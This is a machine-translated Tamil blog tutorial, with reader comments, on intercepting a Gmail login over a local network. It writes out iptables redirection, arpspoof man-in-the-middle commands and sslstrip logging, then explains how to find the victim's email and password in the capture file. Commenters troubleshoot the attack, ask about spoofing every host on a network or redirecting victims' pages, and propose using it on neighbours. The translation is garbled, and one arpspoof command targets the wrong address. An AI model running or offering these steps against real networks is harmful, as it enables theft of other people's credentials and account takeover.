வணக்கம் பதிவர்கள்.
நம்மில் பலர் விரும்பும் எந்தவொரு பாதுகாப்பற்ற நெட்வொர்க்குடனும் இணைக்கப்படுவது எவ்வளவு ஆபத்தானது என்பதற்கான ஒரு சிறிய மாதிரி இன்று என்னிடம் உள்ளது.
இன்று, நான் ஒரு ஜிமெயில் கடவுச்சொல்லைப் பெற Sslstrip உடன் ArpSpoofing ஐப் பயன்படுத்தப் போகிறேன். சூழலை மேலும் கட்டுப்படுத்த, நான் "என்ற கணக்கை உருவாக்கியுள்ளேன்testarp@gmail.com".
முன்னுரைகளை நான் மிகவும் விரும்பவில்லை என்பதால், வணிகத்திற்கு வருவோம்.
சுற்றுச்சூழல்
இந்த சோதனைக்கு நம்மிடம் இருப்பது பின்வருமாறு:
1. தாக்குபவர்: எனது டெஸ்க்டாப் அல்லது டெஸ்க்டாப் கம்ப்யூட்டர் தான் டெபியன் வீஸி. களஞ்சியங்களிலிருந்து நீங்கள் நிறுவலாம் sslstrip y dsniff பெற வேண்டும் ஆர்ப்ஸ்பூஃபிங்
2. பாதிக்கப்பட்டவர்: பாதிக்கப்பட்டவர் ஒரு Android டேப்லெட், அது உலாவியின் மூலம் தனது அஞ்சலை மட்டுமே பார்க்க விரும்புகிறது.
3. நடுத்தர: நடுத்தர என்னுடையது சிஸ்கோ டிபிசி 2425 திசைவி
முகவரிகள்.
தாக்குதல் முகவரி: 172.26.0.2
திசைவி முகவரி: 172.26.0.1
பாதிக்கப்பட்டவரின் முகவரி: 172.26.0.8
தாக்குதல்:
இந்த தாக்குதலுக்கு நாங்கள் முதலில் செய்வோம், முன்னோக்கி செயல்படுத்துவதே, இதனால் எங்கள் கணினி பாதிக்கப்பட்டவருக்கு கவனிக்காமல் தகவல்களை அனுப்ப முடியும். (இல்லையெனில் அது சேவைகள் தாக்குதலை மறுக்கும்)
அதற்கு நாம் பயன்படுத்துவோம்:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
இப்போது நாம் வால் -f செய்தால் desdelinux தகவல்களை நேரடியாகவும் நேரடியாகவும் பார்க்கிறோம்
அப்படியானால் நாம் விரும்புவதை எவ்வாறு பெறுவது?
முதலில் டேப்லெட்டில் எங்கள் அஞ்சலை உள்ளிடுவோம். உள்நுழையும்போது, எங்கள் கன்சோலில் ஆயிரக்கணக்கான மற்றும் ஆயிரக்கணக்கான விஷயங்கள் தோன்றுவதைக் காண்கிறோம்.
இப்போது அது முடிந்ததும், எங்கள் கோப்பைத் திறப்போம் "desdelinux” நானோவுடன்
nano desdelinux
கட்டுப்பாடு + W உடன் SECURE POST எனப்படும் ஒன்றைத் தேடுகிறோம்.
இது போன்ற ஒன்றை நாம் பார்ப்போம்.
பார்க்க முடியாத அந்த பெரிய வரியில் பாதிக்கப்பட்டவரின் மின்னஞ்சல் மற்றும் கடவுச்சொல் உள்ளது.
எனவே சுரங்கப்பாதையின் முடிவில் ஒளியைக் காணும் வரை நாம் வலப்புறம் ஓடுகிறோம்.
இந்த தாக்குதல்களிலிருந்து நாம் எவ்வாறு நம்மை கொஞ்சம் பாதுகாத்துக் கொள்ள முடியும் என்பதை மற்றொரு சந்தர்ப்பத்தில் பார்ப்போம்.
மேற்கோளிடு
இடுகை வெளியிடப்பட்டபோது, கட்டளைகள் சரியாக இல்லை என்று சொல்ல இந்த வாய்ப்பை நான் பயன்படுத்துகிறேன்.
முடிவில் உள்ள iptables கட்டளை 8080 ஐ மற்றொரு வரியில் காணவில்லை. பின்னர் arpspoof கட்டளைகள் அனைத்தும் ஒரே வரியில் இருந்தன. ஒவ்வொரு கட்டளையும் வெவ்வேறு வரியில் இருக்கும்.
ஆசிரியர் அதைப் பார்த்து அதை சரிசெய்ய முடியும் என்று நம்புகிறேன்.
வாழ்த்துக்கள்.
நீங்கள் குறிப்பிட்டுள்ள திருத்தங்களை நான் செய்துள்ளேன், அது சரியா?
நீங்கள் விருப்பமான உள்ளீட்டில் குறியீட்டைச் செருகப் போகிறீர்கள் என்றால், HTML காட்சியைப் பயன்படுத்தவும், நிலுவையில் உள்ளதற்கு அனுப்புவதற்கு முன்பு கட்டுரை சரியானது என்பதை சரிபார்க்கவும். நன்றி.
அறிவு இல்லாத நம்மில் உள்ளவர்கள் மிகவும் பாதிக்கப்படக்கூடியவர்கள் என்பதை அறிந்து கொள்வது சிலிர்க்க வைக்கிறது. மிகச் சிறிய தகவல்கள் நான் கொஞ்சம் கொஞ்சமாகப் புரிந்துகொள்ளும்போது கூட முக்கியத்துவத்தை உணர்கிறேன். நன்றி!
மேற்கோளிடு
ஆனால் தாக்குபவரும் பாதிக்கப்பட்டவரும் ஒரே நெட்வொர்க்கில் இருந்தால் மட்டுமே அது செயல்படும். எப்படியிருந்தாலும், (அதே நெட்வொர்க்கில் இருப்பதால்) நீங்கள் HTTPS ஐப் பயன்படுத்தி இணைக்கிறீர்கள் என்றால் அது நடக்காது, ஏனெனில் உங்கள் கணினியை விட்டு வெளியேறுவதற்கு முன்பு தரவு குறியாக்கம் செய்யப்படுகிறது. நீங்கள் எச்.டி.டி.பி மூலம் இணைத்தால் (எஸ் இல்லாமல்) பிணைய கேபிளைப் பார்த்தால் கூட நீங்கள் விசைகளைப் பார்க்கிறீர்கள் என்று நினைக்கிறேன்.
அது உண்மை இல்லை. நான் ஒரு ஜிமெயில் கடவுச்சொல்லை ஹேக்கிங் செய்கிறேன், ஜிமெயில் https ஐப் பயன்படுத்துவதை நீங்கள் கவனித்தால். அதனால்? புள்ளி என்னவென்றால், https பாதுகாப்பானது என்றாலும், அது http ஐப் பொறுத்தது. எனவே அது அவ்வளவு பாதுகாப்பானது அல்ல.
ஒரு https பற்றி அதிகம் ஒப்புக் கொள்ளாதீர்கள், எஸ் என்பது சூப்பர்மேன் அல்ல, அது "பாதுகாப்பானது"
இது https உடன் அல்லது இல்லாமல் வேலை செய்கிறது, நான் இதை மிகவும் சிறப்பு வாய்ந்த லினக்ஸ் டிஸ்ட்ரோவுடன் முயற்சித்தேன், அது சிக்கல்கள் இல்லாமல் செயல்படுகிறது
உங்கள் வைஃபை திருடுவோருக்கு ஒரு பாடம் கற்பிக்க நீங்கள் இதை துல்லியமாக பயன்படுத்தலாம். 😀
செமா அலோன்சோவின் வலைப்பதிவில் நீண்ட காலத்திற்கு முன்பு அவர்கள் கூறியது போலவே இது அதிகமாகவோ அல்லது குறைவாகவோ உள்ளது:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
ஒஸ்டியா, அது என்ன செய்கிறது! / பின்னர் அவர்கள் வங்கிக் கணக்கைச் சரிபார்க்கச் செல்லும் போது நான் வி.பி.என் பயன்படுத்தும் ஒவ்வொரு முறையும் என் சித்தப்பிரமைக்குச் சொல்கிறார்கள் ...). கருத்துக்களில் இழிந்த மக்கள் எப்படி இருக்கிறார்கள் என்பதை நீங்கள் பார்க்க வேண்டும் ... இறுதியில் அது திருடுகிறது என்றால் ...
உங்கள் சொந்த VPN சேவையை எவ்வாறு உருவாக்குவது மற்றும் வழங்குவது என்பது குறித்த ஒரு டுடோரியலை இப்போது நாம் எடுக்க வேண்டும்.
நீங்கள் இணைக்கும் கதை மிகவும் சுவாரஸ்யமானது, இது ஒரு நாவல் புத்தகத்திற்கு கூட தகுதியானது என்று தோன்றுகிறது, மேலும் இது எனது அண்டை நாடுகளின் இணையத்தைப் பயன்படுத்தும்போது எனக்கு நினைவிருக்கிறது, மேலும் இந்த விஷயத்தை நான் அறிவேன் என்று கூறினாலும், ஆபத்தின் உண்மையான பரிமாணங்களை என்னால் ஒருபோதும் பார்க்க முடியாது என்று நினைக்கிறேன் கடைசியாக, அதிர்ஷ்டவசமாக எனக்கு, அவர்கள் கடவுச்சொல்லை WPA2 க்கு மட்டுமே மாற்றினர், அங்குதான் ISP உடனான எனது கதை ஹாஹா தொடங்கியது
அதனால்தான் தலைப்பு Sslstrip செயலில் உள்ளது என்று கூறுகிறது.
தாக்குபவர் நடுவில் இருக்கும் வரை இது வேலை செய்யும்
ப்ரிஸில் நீங்கள் என்ன அலை வேலை செய்கிறீர்கள்? -.-
இல்லை.
உங்கள் கோரிக்கையை XD அனுப்ப நீங்கள் என்ன காத்திருக்கிறீர்கள்
குறித்து
நல்ல பதிவு
சுவாரஸ்யமானது, நான் பின்னர் ஒரு கல்வி சோதனை செய்வேன் ... ஒருவேளை நான் வைஃபைக்கு கடவுச்சொல்லை அகற்றிவிட்டு சிறிது வேடிக்கையாக இருக்கலாம்
எந்தவொரு சந்தர்ப்பத்திலும், இலக்கு கோரப்பட்ட பக்கங்களுக்கு வெவ்வேறு பக்கங்களை அனுப்புவதற்கு ஒத்த ஏதாவது செய்ய முடியுமா? எடுத்துக்காட்டாக, அவர்கள் பேஸ்புக்கைத் திறக்க விரும்புகிறார்கள், நான் அவற்றை கூகிளுக்கு திருப்பி விடுகிறேன்? 😛
ஆம். ஆனால் இது எல்லாம் மிகவும் வித்தியாசமான ரோல்.
ஒருவேளை நான் அதை பின்னர் இடுகிறேன்.
மிகச் சிறந்த இடுகை, இந்த தலைப்புகள் மிகவும் கல்விசார்ந்தவை, இப்போது நாம் இந்த தாக்குதலை எதிர்கொள்ள முடியும், ஏனெனில் சிலர் (என்னைப் போல) பொது நெட்வொர்க்குகளுடன் (எடுத்துக்காட்டாக பல்கலைக்கழகம்) இணைப்பதால் அதைத் தவிர்ப்பது உதவியாக இருக்கும்.
நன்றி!
இது எனக்கு வேலை செய்யவில்லை
ஒரு சேவையக சான்றிதழ் மூலம் https இணைப்புகள் குறியாக்கம் செய்யப்பட்டுள்ளன என்பதைத் தவிர (இங்கே உங்கள் கணினியில் சான்றிதழ் கிடைத்ததும், உங்கள் உலாவி குறியாக்கத்தின் பொறுப்பில் உள்ளது) ஐபிடேபிள்களுடன் நீங்கள் போர்ட் 80 (http) ஐ திருப்பி விடுகிறீர்கள். , 443 அல்ல, இது https
அதையும் நினைத்தேன். புள்ளி என்னவென்றால், https "பாதுகாப்பானது" என்றாலும் அது துரதிர்ஷ்டவசமாக http ஐப் பொறுத்தது. எனவே sslstrip அதைப் பயன்படுத்திக் கொள்கிறது, இது https நற்சான்றுகளைப் பயன்படுத்துகிறது என்று உலாவி நம்ப வைக்கிறது, ஆனால் அது இல்லை.
புனித மலம்! ஆனால் உலாவி "இந்த சான்றிதழ் சந்தேகத்திற்கிடமான தளத்திலிருந்து வந்தது அல்லது அது போன்ற ஏதாவது" போன்ற எச்சரிக்கையைப் பார்க்க வேண்டும் ... நான் நிச்சயமாக XD சோதனைகளைச் செய்ய வேண்டியிருக்கும்
இல்லை, முற்றிலும் எதுவும் வெளியே வரவில்லை.
இது இறுதியாக எனக்கு வேலை செய்தது
கடவுச்சொல்லுடன் நான் ஒரு WEP நெட்வொர்க்கில் இணைக்கப்பட்டுள்ளேன், அது எப்படியும் கடவுச்சொல்லை நேரடியாக எனக்குக் காட்டியது.
ஒரு கேள்வி. ஒரே நடைமுறையை நீங்கள் செய்ய முடியுமா, ஆனால் ஒரு பாதிக்கப்பட்டவருக்குப் பதிலாக, பிணையத்துடன் இணைக்கப்பட்ட அனைத்து கணினிகளுக்கும்?
ஆமாம் உன்னால் முடியும். ஆனால் நான் சோதனைகள் செய்யவில்லை. அதை நீங்களே முயற்சி செய்து, அது எவ்வாறு செல்கிறது என்பதை எங்களிடம் கூறுங்கள்.
இதனுடன் நான் பெறும் ஒரே விஷயம் என்னவென்றால், பாதிக்கப்பட்டவரின் இயந்திரம் ஆஃப்லைனில் செல்கிறது, ஆனால் எஸ்.எஸ்.எல்ஸ்டிரிப் எனக்கு எதையும் காட்டவில்லை: /
நீங்கள் ஒரு கணம் ஃபயர்வாலை முடக்க வேண்டும். அல்லது குறைந்த பட்சம் உள்வரும் இணைப்புகளை இயக்கவும்.
ஃபேஸ்புக் பக்கத்தின் பயனர்பெயர் மற்றும் கடவுச்சொல்லை மட்டுமே ஆய்வு மற்றும் என்னால் பார்க்க முடிந்தது, ஜிமெயிலில் பதிவில் எந்த முடிவுகளையும் நான் காணவில்லை, மேலும் எனக்கு ஆர்ப்ஸ்பூஃப் «arpspoof -i -t of ஒரு வரி மட்டுமே தேவைப்பட்டது. மறுபுறம், பாதிக்கப்பட்ட இயந்திரத்தால் சில பக்கங்களைத் திறக்க முடியவில்லை. நான் தொடர்ந்து விசாரிப்பேன், இது மிகவும் சுவாரஸ்யமானது. மஞ்சாரோவைப் பயன்படுத்துபவர்களுக்கு ஒரு உதவி, நிறுவ வேண்டிய தொகுப்புகள்: dsniff (இங்கே arpspoff), முறுக்கப்பட்ட மற்றும் python2-pyopenssl. Sslstrip ஐ இங்கிருந்து பதிவிறக்கம் செய்யலாம்: http://www.thoughtcrime.org/software/sslstrip/
இதை இயக்க $ python2 sslstrip.py
வாழ்த்துக்கள்.
இது வெளியே வரவில்லை, ஆனால் ஆர்ஸ்பூஃப் வரி: #arpspoof -i int -t ip-victim ip-router
பாருங்கள் நீங்கள் சொல்வதை நான் சரியாக செய்கிறேன்:
எதிரொலி "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –Destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
பிரச்சனை என்னவென்றால், என் அறையில் நான் வைத்திருக்கும் மற்றொரு பி.சி., பாதிக்கப்பட்டவருக்கு, நான் திசைவியை மறுதொடக்கம் செய்ய வேண்டும் என்பதற்கு எனக்கு எந்த தொடர்பும் இல்லை, நான் என்ன செய்ய முடியும்.
இன்னொரு விஷயம், நான் ஒரு மெய்நிகர் கணினியுடன் பணிபுரிகிறேன், நான் iwconfig கட்டளையை இயக்கும்போது, wlan0 தோன்றாது, அல்லது ifconfig ஐ இயக்கும்போது, எனினும், எனது மெய்நிகர் கணினியில் இணையம் இருந்தால், ஒரு eth0 இடைமுகத்துடன் என்ன.